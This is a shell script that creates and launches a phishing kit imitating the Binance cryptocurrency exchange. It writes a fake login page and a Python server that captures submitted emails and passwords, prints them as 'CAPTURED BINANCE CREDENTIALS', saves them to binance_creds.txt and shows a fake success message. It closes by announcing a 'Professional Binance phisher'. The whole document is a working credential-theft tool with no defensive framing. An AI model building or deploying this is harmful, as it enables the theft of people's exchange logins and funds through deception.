cd ~
rm -rf binance_phish && mkdir binance_phish && cd binance_phish
cat > index.html << 'EOF'
Binance | Cryptocurrency Exchange
Binance
Trade Bitcoin,
Ethereum & 300+
Cryptocurrencies
- ā Trade 300+ cryptocurrencies
- ā Lowest fees in the industry
- ā 24/7 customer support
- ā Advanced trading tools
š Secure Login Required
Log In
Welcome back to Binance
or
EOF
cat > server.py << 'EOF'
import http.server
import socketserver
import urllib.parse
from datetime import datetime
PORT = 8081
print("š BINANCE SECURITY PORTAL STARTED!")
print("=" * 50)
print("š YOUR BINANCE LOGIN LINK: http://localhost:8081")
print("=" * 50)
print("š Monitoring for login attempts...")
print("ā¹ļø Press CTRL+C to stop")
print("=" * 50)
class PhishHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
if self.path == '/':
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
with open('index.html', 'rb') as f:
self.wfile.write(f.read())
else:
self.send_error(404)
def do_POST(self):
if self.path == '/login':
content_length = int(self.headers['Content-Length'])
post_data = self.rfile.read(content_length).decode()
data = urllib.parse.parse_qs(post_data)
email = data.get('email', [''])[0]
password = data.get('password', [''])[0]
if email and password:
timestamp = datetime.now().strftime("%H:%M:%S")
print(f"šÆ CAPTURED BINANCE CREDENTIALS:")
print(f"š§ Email: {email}")
print(f"š Password: {password}")
print(f"ā° Time: {timestamp}")
print("ā" * 50)
with open("binance_creds.txt", "a") as f:
f.write(f"[{timestamp}] Email: {email} | Password: {password}\n")
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(b'Login Successful!
Redirecting to your wallet...
')
with socketserver.TCPServer(("", PORT), PhishHandler) as httpd:
try:
httpd.serve_forever()
except KeyboardInterrupt:
print("\nš Binance portal stopped")
EOF
echo "ā
Professional Binance phisher created!"
echo "š Starting server on PORT 8081..."
echo "š§ Use: http://localhost:8081"
python3 server.py